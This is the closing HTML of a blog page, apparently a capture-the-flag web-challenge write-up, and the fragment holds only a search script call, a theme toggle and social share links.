        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + BUU_WEB%E5%88%B7%E9%A2%98_0x10-0x1F + '&url=' + https%3A%2F%2Fghostasky.github.io%2F2021%2F05%2F03%2FBUU-WEB-0x10-0x1F%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=https://ghostasky.github.io/2021/05/03/BUU-WEB-0x10-0x1F/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
